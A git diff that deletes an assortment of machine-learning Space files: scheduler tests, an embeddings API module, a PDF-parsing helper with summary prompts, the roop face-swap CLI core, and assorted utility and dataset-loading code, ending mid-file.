test_full_loop_no_noise(self): - sample = self.full_loop() - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - def test_full_loop_no_noise_thres(self): - sample = self.full_loop(thresholding=True, dynamic_thresholding_ratio=0.87, sample_max_value=0.5) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 1.1364) < 1e-3 - - def test_full_loop_with_v_prediction(self): - sample = self.full_loop(prediction_type="v_prediction") - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.2251) < 1e-3 - - def test_full_loop_with_karras_and_v_prediction(self): - sample = self.full_loop(prediction_type="v_prediction", use_karras_sigmas=True) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.2096) < 1e-3 - - def test_switch(self): - # make sure that iterating over schedulers with same config names gives same results - # for defaults - scheduler = DPMSolverMultistepScheduler(**self.get_scheduler_config()) - sample = self.full_loop(scheduler=scheduler) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - scheduler = DPMSolverSinglestepScheduler.from_config(scheduler.config) - scheduler = UniPCMultistepScheduler.from_config(scheduler.config) - scheduler = DEISMultistepScheduler.from_config(scheduler.config) - scheduler = DPMSolverMultistepScheduler.from_config(scheduler.config) - - sample = self.full_loop(scheduler=scheduler) - result_mean = torch.mean(torch.abs(sample)) - - assert abs(result_mean.item() - 0.3301) < 1e-3 - - def test_fp16_support(self): - scheduler_class = self.scheduler_classes[0] - scheduler_config = self.get_scheduler_config(thresholding=True, dynamic_thresholding_ratio=0) - scheduler = scheduler_class(**scheduler_config) - - num_inference_steps = 10 - model = self.dummy_model() - sample = self.dummy_sample_deter.half() - scheduler.set_timesteps(num_inference_steps) - - for i, t in enumerate(scheduler.timesteps): - residual = model(sample, t) - sample = scheduler.step(residual, t, sample).prev_sample - - assert sample.dtype == torch.float16 - - def test_unique_timesteps(self, **config): - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - - scheduler.set_timesteps(scheduler.config.num_train_timesteps) - assert len(scheduler.timesteps.unique()) == scheduler.num_inference_steps diff --git a/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py b/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py deleted file mode 100644 index 6c51200b7d2140e52fbd5ab0dd805aadf8c60af6..0000000000000000000000000000000000000000 --- a/spaces/AnimalEquality/chatbot/lv_recipe_chatbot/edamam_api.py +++ /dev/null @@ -1,8 +0,0 @@ -# AUTOGENERATED! DO NOT EDIT! File to edit: ../nbs/04_edamam_api.ipynb. - -# %% auto 0 -__all__ = ['foo'] - -# %% ../nbs/04_edamam_api.ipynb 3 -def foo(): - pass diff --git a/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py b/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py deleted file mode 100644 index 96f44d91d7d5ae5fd78b39b18ce7bdfe54c84c4e..0000000000000000000000000000000000000000 --- a/spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/embeddings.py +++ /dev/null @@ -1,80 +0,0 @@ -import os - -import numpy as np -from extensions.openai.errors import ServiceUnavailableError -from extensions.openai.utils import debug_msg, float_list_to_base64 -from sentence_transformers import SentenceTransformer - -embeddings_params_initialized = False -# using 'lazy loading' to avoid circular import -# so this function will be executed only once -def initialize_embedding_params(): - global embeddings_params_initialized - if not embeddings_params_initialized: - global st_model, embeddings_model, embeddings_device - from extensions.openai.script import params - st_model = os.environ.get("OPENEDAI_EMBEDDING_MODEL", params.get('embedding_model', 'all-mpnet-base-v2')) - embeddings_model = None - # OPENEDAI_EMBEDDING_DEVICE: auto (best or cpu), cpu, cuda, ipu, xpu, mkldnn, opengl, opencl, ideep, hip, ve, fpga, ort, xla, lazy, vulkan, mps, meta, hpu, mtia, privateuseone - embeddings_device = os.environ.get("OPENEDAI_EMBEDDING_DEVICE", params.get('embedding_device', 'cpu')) - if embeddings_device.lower() == 'auto': - embeddings_device = None - embeddings_params_initialized = True - - -def load_embedding_model(model: str) -> SentenceTransformer: - initialize_embedding_params() - global embeddings_device, embeddings_model - try: - embeddings_model = 'loading...' # flag - # see: https://www.sbert.net/docs/package_reference/SentenceTransformer.html#sentence_transformers.SentenceTransformer - emb_model = SentenceTransformer(model, device=embeddings_device) - # ... emb_model.device doesn't seem to work, always cpu anyways? but specify cpu anyways to free more VRAM - print(f"\nLoaded embedding model: {model} on {emb_model.device} [always seems to say 'cpu', even if 'cuda'], max sequence length: {emb_model.max_seq_length}") - except Exception as e: - embeddings_model = None - raise ServiceUnavailableError(f"Error: Failed to load embedding model: {model}", internal_message=repr(e)) - - return emb_model - - -def get_embeddings_model() -> SentenceTransformer: - initialize_embedding_params() - global embeddings_model, st_model - if st_model and not embeddings_model: - embeddings_model = load_embedding_model(st_model) # lazy load the model - return embeddings_model - - -def get_embeddings_model_name() -> str: - initialize_embedding_params() - global st_model - return st_model - - -def get_embeddings(input: list) -> np.ndarray: - return get_embeddings_model().encode(input, convert_to_numpy=True, normalize_embeddings=True, convert_to_tensor=False, device=embeddings_device) - - -def embeddings(input: list, encoding_format: str) -> dict: - - embeddings = get_embeddings(input) - - if encoding_format == "base64": - data = [{"object": "embedding", "embedding": float_list_to_base64(emb), "index": n} for n, emb in enumerate(embeddings)] - else: - data = [{"object": "embedding", "embedding": emb.tolist(), "index": n} for n, emb in enumerate(embeddings)] - - response = { - "object": "list", - "data": data, - "model": st_model, # return the real model - "usage": { - "prompt_tokens": 0, - "total_tokens": 0, - } - } - - debug_msg(f"Embeddings return size: {len(embeddings[0])}, number: {len(embeddings)}") - - return response diff --git a/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py b/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py deleted file mode 100644 index 14a6da436c818b7c2784e92dba66f7947d34b7ce..0000000000000000000000000000000000000000 --- a/spaces/Anonymous-sub/Rerender/gmflow_module/gmflow/position.py +++ /dev/null @@ -1,46 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -# https://github.com/facebookresearch/detr/blob/main/models/position_encoding.py - -import torch -import torch.nn as nn -import math - - -class PositionEmbeddingSine(nn.Module): - """ - This is a more standard version of the position embedding, very similar to the one - used by the Attention is all you need paper, generalized to work on images. - """ - - def __init__(self, num_pos_feats=64, temperature=10000, normalize=True, scale=None): - super().__init__() - self.num_pos_feats = num_pos_feats - self.temperature = temperature - self.normalize = normalize - if scale is not None and normalize is False: - raise ValueError("normalize should be True if scale is passed") - if scale is None: - scale = 2 * math.pi - self.scale = scale - - def forward(self, x): - # x = tensor_list.tensors # [B, C, H, W] - # mask = tensor_list.mask # [B, H, W], input with padding, valid as 0 - b, c, h, w = x.size() - mask = torch.ones((b, h, w), device=x.device) # [B, H, W] - y_embed = mask.cumsum(1, dtype=torch.float32) - x_embed = mask.cumsum(2, dtype=torch.float32) - if self.normalize: - eps = 1e-6 - y_embed = y_embed / (y_embed[:, -1:, :] + eps) * self.scale - x_embed = x_embed / (x_embed[:, :, -1:] + eps) * self.scale - - dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device) - dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats) - - pos_x = x_embed[:, :, :, None] / dim_t - pos_y = y_embed[:, :, :, None] / dim_t - pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3) - pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3) - pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2) - return pos diff --git a/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py b/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py deleted file mode 100644 index 0aba6b7b891fc527c79b887256b0cbaa81ae5b3d..0000000000000000000000000000000000000000 --- a/spaces/Anthony7906/MengHuiMXD_GPT/modules/pdf_func.py +++ /dev/null @@ -1,180 +0,0 @@ -from types import SimpleNamespace -import pdfplumber -import logging -from llama_index import Document - -def prepare_table_config(crop_page): - """Prepare table查找边界, 要求page为原始page - - From https://github.com/jsvine/pdfplumber/issues/242 - """ - page = crop_page.root_page # root/parent - cs = page.curves + page.edges - def curves_to_edges(): - """See https://github.com/jsvine/pdfplumber/issues/127""" - edges = [] - for c in cs: - edges += pdfplumber.utils.rect_to_edges(c) - return edges - edges = curves_to_edges() - return { - "vertical_strategy": "explicit", - "horizontal_strategy": "explicit", - "explicit_vertical_lines": edges, - "explicit_horizontal_lines": edges, - "intersection_y_tolerance": 10, - } - -def get_text_outside_table(crop_page): - ts = prepare_table_config(crop_page) - if len(ts["explicit_vertical_lines"]) == 0 or len(ts["explicit_horizontal_lines"]) == 0: - return crop_page - - ### Get the bounding boxes of the tables on the page. - bboxes = [table.bbox for table in crop_page.root_page.find_tables(table_settings=ts)] - def not_within_bboxes(obj): - """Check if the object is in any of the table's bbox.""" - def obj_in_bbox(_bbox): - """See https://github.com/jsvine/pdfplumber/blob/stable/pdfplumber/table.py#L404""" - v_mid = (obj["top"] + obj["bottom"]) / 2 - h_mid = (obj["x0"] + obj["x1"]) / 2 - x0, top, x1, bottom = _bbox - return (h_mid >= x0) and (h_mid < x1) and (v_mid >= top) and (v_mid < bottom) - return not any(obj_in_bbox(__bbox) for __bbox in bboxes) - - return crop_page.filter(not_within_bboxes) -# 请使用 LaTeX 表达公式,行内公式以 $ 包裹,行间公式以 $$ 包裹 - -extract_words = lambda page: page.extract_words(keep_blank_chars=True, y_tolerance=0, x_tolerance=1, extra_attrs=["fontname", "size", "object_type"]) -# dict_keys(['text', 'x0', 'x1', 'top', 'doctop', 'bottom', 'upright', 'direction', 'fontname', 'size']) - -def get_title_with_cropped_page(first_page): - title = [] # 处理标题 - x0,top,x1,bottom = first_page.bbox # 获取页面边框 - - for word in extract_words(first_page): - word = SimpleNamespace(**word) - - if word.size >= 14: - title.append(word.text) - title_bottom = word.bottom - elif word.text == "Abstract": # 获取页面abstract - top = word.top - - user_info = [i["text"] for i in extract_words(first_page.within_bbox((x0,title_bottom,x1,top)))] - # 裁剪掉上半部分, within_bbox: full_included; crop: partial_included - return title, user_info, first_page.within_bbox((x0,top,x1,bottom)) - -def get_column_cropped_pages(pages, two_column=True): - new_pages = [] - for page in pages: - if two_column: - left = page.within_bbox((0, 0, page.width/2, page.height),relative=True) - right = page.within_bbox((page.width/2, 0, page.width, page.height), relative=True) - new_pages.append(left) - new_pages.append(right) - else: - new_pages.append(page) - - return new_pages - -def parse_pdf(filename, two_column = True): - level = logging.getLogger().level - if level == logging.getLevelName("DEBUG"): - logging.getLogger().setLevel("INFO") - - with pdfplumber.open(filename) as pdf: - title, user_info, first_page = get_title_with_cropped_page(pdf.pages[0]) - new_pages = get_column_cropped_pages([first_page] + pdf.pages[1:], two_column) - - chapters = [] - # tuple (chapter_name, [pageid] (start,stop), chapter_text) - create_chapter = lambda page_start,name_top,name_bottom: SimpleNamespace( - name=[], - name_top=name_top, - name_bottom=name_bottom, - record_chapter_name = True, - - page_start=page_start, - page_stop=None, - - text=[], - ) - cur_chapter = None - - # 按页遍历PDF文档 - for idx, page in enumerate(new_pages): - page = get_text_outside_table(page) - - # 按行遍历页面文本 - for word in extract_words(page): - word = SimpleNamespace(**word) - - # 检查行文本是否以12号字体打印,如果是,则将其作为新章节开始 - if word.size >= 11: # 出现chapter name - if cur_chapter is None: - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - elif not cur_chapter.record_chapter_name or (cur_chapter.name_bottom != cur_chapter.name_bottom and cur_chapter.name_top != cur_chapter.name_top): - # 不再继续写chapter name - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - # 重置当前chapter信息 - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - - # print(word.size, word.top, word.bottom, word.text) - cur_chapter.name.append(word.text) - else: - cur_chapter.record_chapter_name = False # chapter name 结束 - cur_chapter.text.append(word.text) - else: - # 处理最后一个章节 - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - - for i in chapters: - logging.info(f"section: {i.name} pages:{i.page_start, i.page_stop} word-count:{len(i.text)}") - logging.debug(" ".join(i.text)) - - title = " ".join(title) - user_info = " ".join(user_info) - text = f"Article Title: {title}, Information:{user_info}\n" - for idx, chapter in enumerate(chapters): - chapter.name = " ".join(chapter.name) - text += f"The {idx}th Chapter {chapter.name}: " + " ".join(chapter.text) + "\n" - - logging.getLogger().setLevel(level) - return Document(text=text, extra_info={"title": title}) - -BASE_POINTS = """ -1. Who are the authors? -2. What is the process of the proposed method? -3. What is the performance of the proposed method? Please note down its performance metrics. -4. What are the baseline models and their performances? Please note down these baseline methods. -5. What dataset did this paper use? -""" - -READING_PROMPT = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{} -""" - -READING_PROMT_V2 = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{}, - -And You need to generate a brief but informative title for this part. -Your return format: -- title: '...' -- summary: '...' -""" - -SUMMARY_PROMPT = "You are a researcher helper bot. Now you need to read the summaries of a research paper." - - -if __name__ == '__main__': - # Test code - z = parse_pdf("./build/test.pdf") - print(z["user_info"]) - print(z["title"]) \ No newline at end of file diff --git a/spaces/Apex-X/GODROOP/roop/core.py b/spaces/Apex-X/GODROOP/roop/core.py deleted file mode 100644 index d481e49a2e4920154bd19ea67436a6b9f2c14233..0000000000000000000000000000000000000000 --- a/spaces/Apex-X/GODROOP/roop/core.py +++ /dev/null @@ -1,215 +0,0 @@ -#!/usr/bin/env python3 - -import os -import sys -# single thread doubles cuda performance - needs to be set before torch import -if any(arg.startswith('--execution-provider') for arg in sys.argv): - os.environ['OMP_NUM_THREADS'] = '1' -# reduce tensorflow log level -os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' -import warnings -from typing import List -import platform -import signal -import shutil -import argparse -import torch -import onnxruntime -import tensorflow - -import roop.globals -import roop.metadata -import roop.ui as ui -from roop.predictor import predict_image, predict_video -from roop.processors.frame.core import get_frame_processors_modules -from roop.utilities import has_image_extension, is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clean_temp, normalize_output_path - -if 'ROCMExecutionProvider' in roop.globals.execution_providers: - del torch - -warnings.filterwarnings('ignore', category=FutureWarning, module='insightface') -warnings.filterwarnings('ignore', category=UserWarning, module='torchvision') - - -def parse_args() -> None: - signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) - program = argparse.ArgumentParser(formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=100)) - program.add_argument('-s', '--source', help='select an source image', dest='source_path') - program.add_argument('-t', '--target', help='select an target image or video', dest='target_path') - program.add_argument('-o', '--output', help='select output file or directory', dest='output_path') - program.add_argument('--frame-processor', help='frame processors (choices: face_swapper, face_enhancer, ...)', dest='frame_processor', default=['face_swapper'], nargs='+') - program.add_argument('--keep-fps', help='keep original fps', dest='keep_fps', action='store_true', default=False) - program.add_argument('--keep-audio', help='keep original audio', dest='keep_audio', action='store_true', default=True) - program.add_argument('--keep-frames', help='keep temporary frames', dest='keep_frames', action='store_true', default=False) - program.add_argument('--many-faces', help='process every face', dest='many_faces', action='store_true', default=False) - program.add_argument('--video-encoder', help='adjust output video encoder', dest='video_encoder', default='libx264', choices=['libx264', 'libx265', 'libvpx-vp9']) - program.add_argument('--video-quality', help='adjust output video quality', dest='video_quality', type=int, default=18, choices=range(52), metavar='[0-51]') - program.add_argument('--max-memory', help='maximum amount of RAM in GB', dest='max_memory', type=int, default=suggest_max_memory()) - program.add_argument('--execution-provider', help='available execution provider (choices: cpu, ...)', dest='execution_provider', default=['cpu'], choices=suggest_execution_providers(), nargs='+') - program.add_argument('--execution-threads', help='number of execution threads', dest='execution_threads', type=int, default=suggest_execution_threads()) - program.add_argument('-v', '--version', action='version', version=f'{roop.metadata.name} {roop.metadata.version}') - - args = program.parse_args() - - roop.globals.source_path = args.source_path - roop.globals.target_path = args.target_path - roop.globals.output_path = normalize_output_path(roop.globals.source_path, roop.globals.target_path, args.output_path) - roop.globals.frame_processors = args.frame_processor - roop.globals.headless = args.source_path or args.target_path or args.output_path - roop.globals.keep_fps = args.keep_fps - roop.globals.keep_audio = args.keep_audio - roop.globals.keep_frames = args.keep_frames - roop.globals.many_faces = args.many_faces - roop.globals.video_encoder = args.video_encoder - roop.globals.video_quality = args.video_quality - roop.globals.max_memory = args.max_memory - roop.globals.execution_providers = decode_execution_providers(args.execution_provider) - roop.globals.execution_threads = args.execution_threads - - -def encode_execution_providers(execution_providers: List[str]) -> List[str]: - return [execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers] - - -def decode_execution_providers(execution_providers: List[str]) -> List[str]: - return [provider for provider, encoded_execution_provider in zip(onnxruntime.get_available_providers(), encode_execution_providers(onnxruntime.get_available_providers())) - if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers)] - - -def suggest_max_memory() -> int: - if platform.system().lower() == 'darwin': - return 4 - return 16 - - -def suggest_execution_providers() -> List[str]: - return encode_execution_providers(onnxruntime.get_available_providers()) - - -def suggest_execution_threads() -> int: - if 'DmlExecutionProvider' in roop.globals.execution_providers: - return 1 - if 'ROCMExecutionProvider' in roop.globals.execution_providers: - return 1 - return 8 - - -def limit_resources() -> None: - # prevent tensorflow memory leak - gpus = tensorflow.config.experimental.list_physical_devices('GPU') - for gpu in gpus: - tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ - tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit=1024) - ]) - # limit memory usage - if roop.globals.max_memory: - memory = roop.globals.max_memory * 1024 ** 3 - if platform.system().lower() == 'darwin': - memory = roop.globals.max_memory * 1024 ** 6 - if platform.system().lower() == 'windows': - import ctypes - kernel32 = ctypes.windll.kernel32 - kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) - else: - import resource - resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) - - -def release_resources() -> None: - if 'CUDAExecutionProvider' in roop.globals.execution_providers: - torch.cuda.empty_cache() - - -def pre_check() -> bool: - if sys.version_info < (3, 9): - update_status('Python version is not supported - please upgrade to 3.9 or higher.') - return False - if not shutil.which('ffmpeg'): - update_status('ffmpeg is not installed.') - return False - return True - - -def update_status(message: str, scope: str = 'ROOP.CORE') -> None: - print(f'[{scope}] {message}') - if not roop.globals.headless: - ui.update_status(message) - - -def start() -> None: - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - if not frame_processor.pre_start(): - return - # process image to image - if has_image_extension(roop.globals.target_path): - if predict_image(roop.globals.target_path): - destroy() - shutil.copy2(roop.globals.target_path, roop.globals.output_path) - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - update_status('Progressing...', frame_processor.NAME) - frame_processor.process_image(roop.globals.source_path, roop.globals.output_path, roop.globals.output_path) - frame_processor.post_process() - release_resources() - if is_image(roop.globals.target_path): - update_status('Processing to image succeed!') - else: - update_status('Processing to image failed!') - return - # process image to videos - if predict_video(roop.globals.target_path): - destroy() - update_status('Creating temp resources...') - create_temp(roop.globals.target_path) - update_status('Extracting frames...') - extract_frames(roop.globals.target_path) - temp_frame_paths = get_temp_frame_paths(roop.globals.target_path) - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - update_status('Progressing...', frame_processor.NAME) - frame_processor.process_video(roop.globals.source_path, temp_frame_paths) - frame_processor.post_process() - release_resources() - # handles fps - if roop.globals.keep_fps: - update_status('Detecting fps...') - fps = detect_fps(roop.globals.target_path) - update_status(f'Creating video with {fps} fps...') - create_video(roop.globals.target_path, fps) - else: - update_status('Creating video with 30.0 fps...') - create_video(roop.globals.target_path) - # handle audio - if roop.globals.keep_audio: - if roop.globals.keep_fps: - update_status('Restoring audio...') - else: - update_status('Restoring audio might cause issues as fps are not kept...') - restore_audio(roop.globals.target_path, roop.globals.output_path) - else: - move_temp(roop.globals.target_path, roop.globals.output_path) - # clean and validate - clean_temp(roop.globals.target_path) - if is_video(roop.globals.target_path): - update_status('Processing to video succeed!') - else: - update_status('Processing to video failed!') - - -def destroy() -> None: - if roop.globals.target_path: - clean_temp(roop.globals.target_path) - quit() - - -def run() -> None: - parse_args() - if not pre_check(): - return - for frame_processor in get_frame_processors_modules(roop.globals.frame_processors): - if not frame_processor.pre_check(): - return - limit_resources() - if roop.globals.headless: - start() - else: - window = ui.init(start, destroy) - window.mainloop() diff --git a/spaces/Artrajz/vits-simple-api/gunicorn_config.py b/spaces/Artrajz/vits-simple-api/gunicorn_config.py deleted file mode 100644 index abce6691ba08903ecb6972ec79cf36c1298c4a8a..0000000000000000000000000000000000000000 --- a/spaces/Artrajz/vits-simple-api/gunicorn_config.py +++ /dev/null @@ -1,19 +0,0 @@ -import gc -import multiprocessing - -bind = "0.0.0.0:23456" -# workers = multiprocessing.cpu_count() -workers = 1 -preload_app = True - -# disable GC in master as early as possible -gc.disable() - -def when_ready(server): - # freeze objects after preloading app - gc.freeze() - print("Objects frozen in perm gen: ", gc.get_freeze_count()) - -def post_fork(server, worker): - # reenable GC on worker - gc.enable() \ No newline at end of file diff --git a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py b/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py deleted file mode 100644 index 8765b907d70c4a530bc90dc88f24b3df73473b01..0000000000000000000000000000000000000000 --- a/spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_vendor/urllib3/contrib/_appengine_environ.py +++ /dev/null @@ -1,36 +0,0 @@ -""" -This module provides means to detect the App Engine environment. -""" - -import os - - -def is_appengine(): - return is_local_appengine() or is_prod_appengine() - - -def is_appengine_sandbox(): - """Reports if the app is running in the first generation sandbox. - - The second generation runtimes are technically still in a sandbox, but it - is much less restrictive, so generally you shouldn't need to check for it. - see https://cloud.google.com/appengine/docs/standard/runtimes - """ - return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" - - -def is_local_appengine(): - return "APPENGINE_RUNTIME" in os.environ and os.environ.get( - "SERVER_SOFTWARE", "" - ).startswith("Development/") - - -def is_prod_appengine(): - return "APPENGINE_RUNTIME" in os.environ and os.environ.get( - "SERVER_SOFTWARE", "" - ).startswith("Google App Engine/") - - -def is_prod_appengine_mvms(): - """Deprecated.""" - return False diff --git a/spaces/Awesimo/jojogan/op/conv2d_gradfix.py b/spaces/Awesimo/jojogan/op/conv2d_gradfix.py deleted file mode 100644 index 05796d3386bddb92686524caa1412104a861a79a..0000000000000000000000000000000000000000 --- a/spaces/Awesimo/jojogan/op/conv2d_gradfix.py +++ /dev/null @@ -1,227 +0,0 @@ -import contextlib -import warnings - -import torch -from torch import autograd -from torch.nn import functional as F - -enabled = True -weight_gradients_disabled = False - - -@contextlib.contextmanager -def no_weight_gradients(): - global weight_gradients_disabled - - old = weight_gradients_disabled - weight_gradients_disabled = True - yield - weight_gradients_disabled = old - - -def conv2d(input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1): - if could_use_op(input): - return conv2d_gradfix( - transpose=False, - weight_shape=weight.shape, - stride=stride, - padding=padding, - output_padding=0, - dilation=dilation, - groups=groups, - ).apply(input, weight, bias) - - return F.conv2d( - input=input, - weight=weight, - bias=bias, - stride=stride, - padding=padding, - dilation=dilation, - groups=groups, - ) - - -def conv_transpose2d( - input, - weight, - bias=None, - stride=1, - padding=0, - output_padding=0, - groups=1, - dilation=1, -): - if could_use_op(input): - return conv2d_gradfix( - transpose=True, - weight_shape=weight.shape, - stride=stride, - padding=padding, - output_padding=output_padding, - groups=groups, - dilation=dilation, - ).apply(input, weight, bias) - - return F.conv_transpose2d( - input=input, - weight=weight, - bias=bias, - stride=stride, - padding=padding, - output_padding=output_padding, - dilation=dilation, - groups=groups, - ) - - -def could_use_op(input): - if (not enabled) or (not torch.backends.cudnn.enabled): - return False - - if input.device.type != "cuda": - return False - - if any(torch.__version__.startswith(x) for x in ["1.7.", "1.8.", "1.9", "1.10"]): - return True - - warnings.warn( - f"conv2d_gradfix not supported on PyTorch {torch.__version__}. Falling back to torch.nn.functional.conv2d()." - ) - - return False - - -def ensure_tuple(xs, ndim): - xs = tuple(xs) if isinstance(xs, (tuple, list)) else (xs,) * ndim - - return xs - - -conv2d_gradfix_cache = dict() - - -def conv2d_gradfix( - transpose, weight_shape, stride, padding, output_padding, dilation, groups -): - ndim = 2 - weight_shape = tuple(weight_shape) - stride = ensure_tuple(stride, ndim) - padding = ensure_tuple(padding, ndim) - output_padding = ensure_tuple(output_padding, ndim) - dilation = ensure_tuple(dilation, ndim) - - key = (transpose, weight_shape, stride, padding, output_padding, dilation, groups) - if key in conv2d_gradfix_cache: - return conv2d_gradfix_cache[key] - - common_kwargs = dict( - stride=stride, padding=padding, dilation=dilation, groups=groups - ) - - def calc_output_padding(input_shape, output_shape): - if transpose: - return [0, 0] - - return [ - input_shape[i + 2] - - (output_shape[i + 2] - 1) * stride[i] - - (1 - 2 * padding[i]) - - dilation[i] * (weight_shape[i + 2] - 1) - for i in range(ndim) - ] - - class Conv2d(autograd.Function): - @staticmethod - def forward(ctx, input, weight, bias): - if not transpose: - out = F.conv2d(input=input, weight=weight, bias=bias, **common_kwargs) - - else: - out = F.conv_transpose2d( - input=input, - weight=weight, - bias=bias, - output_padding=output_padding, - **common_kwargs, - ) - - ctx.save_for_backward(input, weight) - - return out - - @staticmethod - def backward(ctx, grad_output): - input, weight = ctx.saved_tensors - grad_input, grad_weight, grad_bias = None, None, None - - if ctx.needs_input_grad[0]: - p = calc_output_padding( - input_shape=input.shape, output_shape=grad_output.shape - ) - grad_input = conv2d_gradfix( - transpose=(not transpose), - weight_shape=weight_shape, - output_padding=p, - **common_kwargs, - ).apply(grad_output, weight, None) - - if ctx.needs_input_grad[1] and not weight_gradients_disabled: - grad_weight = Conv2dGradWeight.apply(grad_output, input) - - if ctx.needs_input_grad[2]: - grad_bias = grad_output.sum((0, 2, 3)) - - return grad_input, grad_weight, grad_bias - - class Conv2dGradWeight(autograd.Function): - @staticmethod - def forward(ctx, grad_output, input): - op = torch._C._jit_get_operation( - "aten::cudnn_convolution_backward_weight" - if not transpose - else "aten::cudnn_convolution_transpose_backward_weight" - ) - flags = [ - torch.backends.cudnn.benchmark, - torch.backends.cudnn.deterministic, - torch.backends.cudnn.allow_tf32, - ] - grad_weight = op( - weight_shape, - grad_output, - input, - padding, - stride, - dilation, - groups, - *flags, - ) - ctx.save_for_backward(grad_output, input) - - return grad_weight - - @staticmethod - def backward(ctx, grad_grad_weight): - grad_output, input = ctx.saved_tensors - grad_grad_output, grad_grad_input = None, None - - if ctx.needs_input_grad[0]: - grad_grad_output = Conv2d.apply(input, grad_grad_weight, None) - - if ctx.needs_input_grad[1]: - p = calc_output_padding( - input_shape=input.shape, output_shape=grad_output.shape - ) - grad_grad_input = conv2d_gradfix( - transpose=(not transpose), - weight_shape=weight_shape, - output_padding=p, - **common_kwargs, - ).apply(grad_output, grad_grad_weight, None) - - return grad_grad_output, grad_grad_input - - conv2d_gradfix_cache[key] = Conv2d - - return Conv2d diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py deleted file mode 100644 index 48c136f1623261b079591065fec7c7fc38165076..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/data/datasets/cityscapes_panoptic.py +++ /dev/null @@ -1,187 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import json -import logging -import os - -from detectron2.data import DatasetCatalog, MetadataCatalog -from detectron2.data.datasets.builtin_meta import CITYSCAPES_CATEGORIES -from detectron2.utils.file_io import PathManager - -""" -This file contains functions to register the Cityscapes panoptic dataset to the DatasetCatalog. -""" - - -logger = logging.getLogger(__name__) - - -def get_cityscapes_panoptic_files(image_dir, gt_dir, json_info): - files = [] - # scan through the directory - cities = PathManager.ls(image_dir) - logger.info(f"{len(cities)} cities found in '{image_dir}'.") - image_dict = {} - for city in cities: - city_img_dir = os.path.join(image_dir, city) - for basename in PathManager.ls(city_img_dir): - image_file = os.path.join(city_img_dir, basename) - - suffix = "_leftImg8bit.png" - assert basename.endswith(suffix), basename - basename = os.path.basename(basename)[: -len(suffix)] - - image_dict[basename] = image_file - - for ann in json_info["annotations"]: - image_file = image_dict.get(ann["image_id"], None) - assert image_file is not None, "No image {} found for annotation {}".format( - ann["image_id"], ann["file_name"] - ) - label_file = os.path.join(gt_dir, ann["file_name"]) - segments_info = ann["segments_info"] - - files.append((image_file, label_file, segments_info)) - - assert len(files), "No images found in {}".format(image_dir) - assert PathManager.isfile(files[0][0]), files[0][0] - assert PathManager.isfile(files[0][1]), files[0][1] - return files - - -def load_cityscapes_panoptic(image_dir, gt_dir, gt_json, meta): - """ - Args: - image_dir (str): path to the raw dataset. e.g., "~/cityscapes/leftImg8bit/train". - gt_dir (str): path to the raw annotations. e.g., - "~/cityscapes/gtFine/cityscapes_panoptic_train". - gt_json (str): path to the json file. 